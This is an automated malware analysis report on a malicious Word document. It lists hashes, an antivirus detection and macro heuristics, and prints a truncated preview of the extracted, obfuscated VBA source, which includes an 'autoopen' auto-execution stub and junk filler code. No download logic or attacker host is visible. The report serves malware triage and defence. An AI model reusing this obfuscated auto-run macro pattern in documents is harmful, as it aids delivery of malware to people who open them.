Office (OLE) malware analysis — malicious · 8271d5ac4a0356ac

MALICIOUS

Office (OLE)

118.9 KB Created: 2019-04-08 19:35:00 Authoring application: Microsoft Office Word First seen: 2020-08-10

MD5: add38ca8db55941c3265fe34d3d0050e SHA-1: 60f1a037d2a32b9b045df889ab4581aa26919206 SHA-256: 8271d5ac4a0356ac810e79b61399eeea2fded9c45dded7a6cde5fdd24d0d36de

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros. The presence of an AutoOpen macro and a GetObject call within the VBA code strongly suggests that the macro is designed to execute automatically upon opening the document. This macro likely serves to download and execute a secondary payload, a common technique for malware delivery.

Heuristics 7

ClamAV: Doc.Malware.00536d-6934484-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6934484-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51317 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51317 bytes
SHA-256: `74c3700ac7f120d806c1240d29ceeab42c00b2a3c505ca473074740b2df8640a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wBwDCDQU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "OCDADAAD" Attribute VB_Base = "0{5E1660AC-1C5B-4601-8C2B-917CE90B077F}{003EC1B5-301F-499C-8316-195B70F4B799}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "GkDACBk" Attribute VB_Base = "0{94613F18-F5EC-4CD5-BC55-C5D11C3DFC3B}{AC413878-67E0-4190-A2FC-0A5A58E238AA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CXZAAB" Function DkZZZA() If bCQQcA = 240687997 Then Select Case Y4AAACA1 Case 854290183 Day _ CInt(353689534) Day CStr(oACAABB _ * 475414670 / 531040945 + Log(cQkAAkx)) Day 834803126 Case 896507899 Day 684169728 Day _ Atn(728937559) Day Cos(lUCAQUQC + _ CSng(p_XcAAA)) End Select If jxGGAAA Xor G_GABA Then Day _ Hex(814187661) End If End If If iABAAB4 = 845718600 Then Select Case ExZUUA Case 691970717 Day _ CInt(999630805) Day CStr(nkAACAA _ * 518230318 / 137836354 + Log(UDXAcDkc)) Day 559022635 Case 320674797 Day 456152693 Day _ Atn(363001595) Day Cos(OABAAA_ + _ CSng(jA4AAU)) End Select If SwUUCo Xor zAAoUB Then Day _ Hex(914058234) End If End If End Function Sub autoopen() JAkAQA End Sub Function HAAkAwXA() If zkAx_k = 498428042 Then Select Case wBCwcAo Case 307615261 Day _ CInt(480646112) Day CStr(sUwxAA _ * 663282042 / 992982471 + Log(f1AkAAAG)) Day 835210174 Case 359879233 Day 332880323 Day _ Atn(309605645) Day Cos(wXGDUC1U + _ CSng(K_A4oAD)) End Select If oCAwAB Xor UAUUooCx Then Day _ Hex(69693989) End If End If If ZcAwDAA = 956730295 Then Select Case pA11AAQ Case 540418410 Day _ CInt(296876234) Day CStr(pQUwAA _ * 255697160 / 31380228 + Log(lxcAUAw)) Day 956453124 Case 689392450 Day 753251932 Day _ Atn(45165329) Day Cos(bUUCGDAD + _ CSng(vAwCBAA4)) End Select If BAw1AUU Xor QAACBA Then Day _ Hex(807643208) End If End If If BZC441 = 800363176 Then Select Case aAxAAAw Case 733478269 Day _ CInt(620623386) Day CStr(XcAZ_4 _ * 971021366 / 369160997 + Log(EQQo_Q_)) Day 180790779 Case 205097660 Day 460280401 Day _ Atn(530713947) Day Cos(GABAA1cA + _ CSng(FAXDxQAC)) End Select If OQXCAAB Xor jwcZoBkk Then Day _ Hex(164340210) End If End If End Function Attribute VB_Name = "ZGD_ckQC" Function z4_DAo_() If awoBADDA = 823902824 Then Select Case vQUGDQQ Case 280630794 Day _ CInt(357532929) Day CStr(TwcAC4A _ * 186354655 / 832994829 + Log(JoC_Dw)) Day 794974942 Case 116889907 Day 79305042 Day _ Atn(167595717) Day Cos(vAAAwk + _ CSng(qk1XX_D)) End Select If aZwBAA Xor ZxB1UADQ Then Day _ Hex(507647989) End If End If If BBcAAAQ = 847189907 Then Select Case NAAUA_ Case 373517403 Day _ CInt(612614484) Day ... (truncated)

SHA-256: 74c3700ac7f120d806c1240d29ceeab42c00b2a3c505ca473074740b2df8640a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wBwDCDQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OCDADAAD"
Attribute VB_Base = "0{5E1660AC-1C5B-4601-8C2B-917CE90B077F}{003EC1B5-301F-499C-8316-195B70F4B799}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "GkDACBk"
Attribute VB_Base = "0{94613F18-F5EC-4CD5-BC55-C5D11C3DFC3B}{AC413878-67E0-4190-A2FC-0A5A58E238AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CXZAAB"
Function DkZZZA()
      If bCQQcA = 240687997 Then
      Select Case Y4AAACA1
         Case 854290183
            Day _
CInt(353689534)
            Day CStr(oACAABB _
* 475414670 / 531040945 + Log(cQkAAkx))
            Day 834803126
         Case 896507899
            Day 684169728
            Day _
Atn(728937559)
            Day Cos(lUCAQUQC + _
CSng(p_XcAAA))
      End Select
      If jxGGAAA Xor G_GABA Then
         Day _
Hex(814187661)
      End If
   End If
      If iABAAB4 = 845718600 Then
      Select Case ExZUUA
         Case 691970717
            Day _
CInt(999630805)
            Day CStr(nkAACAA _
* 518230318 / 137836354 + Log(UDXAcDkc))
            Day 559022635
         Case 320674797
            Day 456152693
            Day _
Atn(363001595)
            Day Cos(OABAAA_ + _
CSng(jA4AAU))
      End Select
      If SwUUCo Xor zAAoUB Then
         Day _
Hex(914058234)
      End If
   End If
End Function
Sub autoopen()
JAkAQA
End Sub
Function HAAkAwXA()
      If zkAx_k = 498428042 Then
      Select Case wBCwcAo
         Case 307615261
            Day _
CInt(480646112)
            Day CStr(sUwxAA _
* 663282042 / 992982471 + Log(f1AkAAAG))
            Day 835210174
         Case 359879233
            Day 332880323
            Day _
Atn(309605645)
            Day Cos(wXGDUC1U + _
CSng(K_A4oAD))
      End Select
      If oCAwAB Xor UAUUooCx Then
         Day _
Hex(69693989)
      End If
   End If
      If ZcAwDAA = 956730295 Then
      Select Case pA11AAQ
         Case 540418410
            Day _
CInt(296876234)
            Day CStr(pQUwAA _
* 255697160 / 31380228 + Log(lxcAUAw))
            Day 956453124
         Case 689392450
            Day 753251932
            Day _
Atn(45165329)
            Day Cos(bUUCGDAD + _
CSng(vAwCBAA4))
      End Select
      If BAw1AUU Xor QAACBA Then
         Day _
Hex(807643208)
      End If
   End If
      If BZC441 = 800363176 Then
      Select Case aAxAAAw
         Case 733478269
            Day _
CInt(620623386)
            Day CStr(XcAZ_4 _
* 971021366 / 369160997 + Log(EQQo_Q_))
            Day 180790779
         Case 205097660
            Day 460280401
            Day _
Atn(530713947)
            Day Cos(GABAA1cA + _
CSng(FAXDxQAC))
      End Select
      If OQXCAAB Xor jwcZoBkk Then
         Day _
Hex(164340210)
      End If
   End If
End Function


Attribute VB_Name = "ZGD_ckQC"
Function z4_DAo_()
      If awoBADDA = 823902824 Then
      Select Case vQUGDQQ
         Case 280630794
            Day _
CInt(357532929)
            Day CStr(TwcAC4A _
* 186354655 / 832994829 + Log(JoC_Dw))
            Day 794974942
         Case 116889907
            Day 79305042
            Day _
Atn(167595717)
            Day Cos(vAAAwk + _
CSng(qk1XX_D))
      End Select
      If aZwBAA Xor ZxB1UADQ Then
         Day _
Hex(507647989)
      End If
   End If
      If BBcAAAQ = 847189907 Then
      Select Case NAAUA_
         Case 373517403
            Day _
CInt(612614484)
            Day 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.